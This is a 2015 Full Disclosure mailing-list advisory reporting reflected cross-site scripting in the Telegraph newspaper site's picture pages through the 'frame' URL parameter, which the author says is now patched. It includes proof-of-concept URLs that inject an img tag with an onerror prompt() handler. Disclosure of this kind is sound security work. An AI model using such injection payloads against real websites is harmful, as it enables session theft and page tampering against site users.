[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks
From:       Jing Wang <justqdjing () gmail ! com>
Date:       2015-10-30 12:28:42
Message-ID: CAFWG0-hKcVqehZeZFBFET8bZOUbPB=in1CYCVX9Vm+nJZj1onw () mail ! gmail ! com
[Download RAW message or body]

*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discoved and Disclosured By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Vulnerability Description:*
Telegraph has a Web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "&frame" as its parameter.
All its web pages use "&frame" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
 http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
 http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
 http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
 http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278




*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095"><img
 src=x onerror=prompt('justqdjing')>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162"><img
 src=x onerror=prompt('justqdjing')>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280"><img
 src=x onerror=prompt('justqdjing')>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790"><img
 src=x onerror=prompt('justqdjing')>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278"><img
 src=x onerror=prompt('justqdjing')>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 7. The
bugs found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWSAP)




*Poc Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA&feature=youtu.be





*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html





*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic